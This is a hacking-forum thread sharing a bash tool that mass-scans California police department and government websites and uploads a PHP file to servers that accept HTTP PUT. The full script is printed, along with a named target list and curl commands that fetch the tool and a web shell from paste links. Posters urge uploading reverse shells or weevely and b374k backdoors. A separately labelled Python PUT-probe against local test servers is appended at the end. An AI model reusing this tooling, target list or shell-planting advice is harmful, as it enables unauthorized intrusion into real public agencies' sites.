putExploiter
#1
#################################Usage >>>
Code:
root@tor:/opt# bash putExploiter calPigs
[ PUT - fileUploader ]
[ ifsoe.One_818x909 ]
calPigs
<<<< ########################################

calPigs = List of targetSites. Only include the site ( Ex. google.com )
        >>One line x One Site<<
____________________________________
Here is the content of my file: the State of California's police departments.

Code:
root@tor:/opt# cat -n calPigs
   380    www.vpd.ci.visalia.ca.us
   381    www.walnutvalley.k12.ca.us
   382    www.wcpd.org
   383    www.wehosheriff.com
   384    www.west.net
   385    www.whittierpd.org
   386    www.wvmccd.cc.ca.us
   387    www.yolocounty.org
   388    www.yucaipa.org
   389    www1.ridgecrest.ca.us
   390    www2.ucsc.edu
   391    wwwsa.csuhayward.edu
____________________________________

When a website is no longer available you'll see:
Code:
ping: ci.sonora.ca.us: Name or service not known

Keep your list of targets under 5 for a shorter run.
Most importantly, do some proper recon so that you
can sort your targets and remove those which lead to
a direct WAF (Akamai, Cloudflare, BigIP, etc.) as
this is a "WASTE of TIME"...

Run this to download it, then enter your targets list:
Code:
curl -o putExploiter "https://paste.sh/Ph9MBSfv#Q1t3dWT1MMNsRKA-O29PuuEW"
echo "Like This -> bash putExploiter <targetsFile>"

Upon successfully exploiting, visit the URL that includes the directory "/666.php".
You are able to upload local files to the remote target site. I recommend maybe >>> a reverse shell!....

Keep in mind the target must have the PUT option enabled to be considered "Possibly-Vuln".
Enjoy @GreySec...
Reply
#2
Cool exploit! Never heard of it before. Kind of reminds me of the WebDav methods.
Thanks for sharing! I'll give this a test-run.
Reply
#3
(12-31-2017, 02:01 AM)Insider Wrote: Cool exploit! Never heard of it before. Kind of reminds me of the WebDav methods.
Thanks for sharing! I'll give this a test-run.

Yeah, pretty much identical to WebDAV PUT exploitation. The only difference is that I noticed it worked on over 50 different police departments <<<<(o.0)
Any one need their record cleared?....


@Insider try uploading this one right here, it's pretty clean:
Code:
curl -o br.php https://paste.sh/EgdolA4z#f9-xhrx_IRdT9vNM4-sdlhLQ
Reply
#4
I'll look into this and give ya good review after I've attempted it my friend, thanks again for the share!
Reply
#5
Yep, I think I spotted a bug but didn't have time to check it out. I'll include the fixed version when I'm done with my family thing here for New Year's..
Reply
#6
(12-31-2017, 08:34 PM)blahblahblah Wrote: Yep, I think I spotted a bug but didn't have time to check it out. I'll include the fixed version when I'm done with my family thing here for New Year's..

Not a problem at all, Happy New Year and enjoy your time and release it when you get the chance my friend!
Reply
#7
Servers accepting PUT requests is indeed a common web vulnerability. Some kind of automation tool would be amazing to exploit this more easily.

Did you code this yourself? I'm wondering why you uploaded it to a pastebin, it's only 35 lines:

Code:
#!/bin/bash
# Usage: bash putExploiter <targetsFile>   (one hostname per line)
echo "[ PUT - fileUploader ]"
echo "[ ifsoe.One_818x909 ]"

sleep 4

echo "$1"
# Resolve every hostname with a single ping; names that no longer resolve print an error and drop out
rm -f out
for i in $(cat "$1"); do
  ping -c1 "$i" >> out
done
# Pull the IPv4 addresses out of the ping output and reduce each one to its /24 (first three octets)
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' out > Out
cut -f1-3 -d. Out | sort -u > ip
# One masscan range per /24; append, so every resolved network is kept rather than only the last one
rm -f TargetIPs
for i in $(cat ip); do
  echo "${i}.1-${i}.200" >> TargetIPs
done
# Fast sweep of the collected ranges for open port 80
masscan --max-rate=10000 -Pn -p80 -iL TargetIPs --open --output-file ips
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' ips | sort -u > Results
cat Results
rm -f ips ip Out out
# Run the http-put NSE script on the usual web ports of every live host;
# --append-output keeps the four parallel nmaps from clobbering each other's results in "put"
rm -f put
for i in $(cat Results); do
  nmap -sV -p 80 "$i" --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put --append-output &
  nmap -sV -p 443 "$i" --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put --append-output &
  nmap -sV -p 8080 "$i" --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put --append-output &
  nmap -sV -p 8443 "$i" --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put --append-output &
  wait
done
cat put
rm -f TargetIPs Results
exit 0

You're also using masscan to scan port 80 but then using nmap's PUT script on ports 443,8080,8443? That's a little confusing to me. Assuming masscan is only validating open ports (which nmap can do), why not just do it all on one line?

Code:
nmap -T5 -sV -p 80,443,8080,8443 $i --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put &

You should also include -T5 to increase the speed of the scan. Also, what's "666.txt"? You might be interested in this github project. It's an "administration tool" but we can use it for malicious purposes. Another useful tool is Weevely, which I'm betting has been shared on this forum several times already. If you manage to PUT a weevely or b374k payload on a vulnerable server running PHP, it's pretty much game over for the site.

On a more technical note, your shell script could use some variables and arrays which would help with writing and removing data to the disk between commands. Your script *works*, it gets the job done, but using variables is just a more elegant way of doing things. I might be willing to demonstrate a cleaner version of the script if you're interested.
Reply
#8
Be my guest, this was more of a PoC rather than a full-blown script..
curl -o br.php https://paste.sh/EgdolA4z#f9-xhrx_IRdT9vNM4-sdlhLQ <--- 666.txt

Yeah, I'm aware of those tools; the masscan is obvious. "mass" scan ran through port 80s faster than a -T5 nmap, validating only --open. The reason for nmap running on those ports afterwards without -T5 is because PUT is available on those ports as well; also, running on -T5 you get false negatives, "Upload not successful" type msg.

If it ended up on a pastebin it's because I didn't want to keep it on my hard drive. Sharing purposes only...
Reply
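Added example, not the thread's script and not anything from the paste links: a small Python probe for what post #1 calls the PUT option being enabled, written the way post #8's false-negative remark suggests it should be. It reads what OPTIONS advertises, sends a PUT, then proves the upload landed by fetching the file back with GET instead of trusting the PUT status code, and finally DELETEs the probe file. The two handler classes are constructed loopback test servers standing in for a target, one that accepts PUT (misconfigured) and one that refuses it with 405 (hardened); the host, port, path and payload are assumptions for the demo.

```python
# Added example (not the thread's script): probe a web server for an enabled PUT method
# and confirm the upload by fetching it back, rather than trusting the PUT status alone.
# Both handler classes are constructed local test servers standing in for a target.
import http.client
import http.server
import threading


class PutAllowedHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a misconfigured server: PUT stores the body, DELETE removes it."""
    store = {}

    def _reply(self, status, body=b"", allow="GET,HEAD,PUT,DELETE,OPTIONS"):
        self.send_response(status)
        self.send_header("Allow", allow)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200)

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", "0"))
        self.store[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404)
        else:
            self._reply(200, body)

    def do_DELETE(self):
        self._reply(204 if self.store.pop(self.path, None) is not None else 404)

    def log_message(self, *args):  # keep the demo quiet
        pass


class PutDeniedHandler(PutAllowedHandler):
    """Hardened variant: PUT and DELETE are refused with 405 and not advertised in Allow."""
    store = {}

    def do_OPTIONS(self):
        self._reply(200, allow="GET,HEAD,OPTIONS")

    def do_PUT(self):
        self._reply(405, allow="GET,HEAD,OPTIONS")

    do_DELETE = do_PUT


def probe_put(host, port, path="/put-probe.txt", payload=b"put-probe", cleanup=True):
    """Return what OPTIONS advertises, the PUT status, and whether the bytes can be fetched back.
    'put_accepted' is what a status-only check reports; 'verified' is what proves the upload landed."""
    conn = http.client.HTTPConnection(host, port, timeout=5)

    def call(method, target, body=None):
        headers = {"Content-Type": "text/plain"} if body is not None else {}
        conn.request(method, target, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Allow", ""), resp.read()

    _, allow, _ = call("OPTIONS", "/")
    put_status, _, _ = call("PUT", path, payload)
    get_status, _, got = call("GET", path)
    verified = get_status == 200 and got == payload
    if verified and cleanup:
        call("DELETE", path)  # leave nothing behind on the target
    conn.close()
    return {
        "allow": allow,
        "put_status": put_status,
        "put_accepted": 200 <= put_status < 300,
        "verified": verified,
    }


def run_demo():
    """Start both constructed servers on loopback (assumed 127.0.0.1, ephemeral port), probe each,
    shut them down, and return both results keyed by server type."""
    results = {}
    for name, handler in (("misconfigured", PutAllowedHandler), ("hardened", PutDeniedHandler)):
        srv = http.server.HTTPServer(("127.0.0.1", 0), handler)
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        try:
            results[name] = probe_put("127.0.0.1", srv.server_address[1])
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

Against a real host you would call probe_put with its name and port; the GET-back step is the part that separates a server that merely answers 2xx to PUT from one that actually wrote the file where you can reach it, which is the distinction the "Upload not successful" messages in the thread blur.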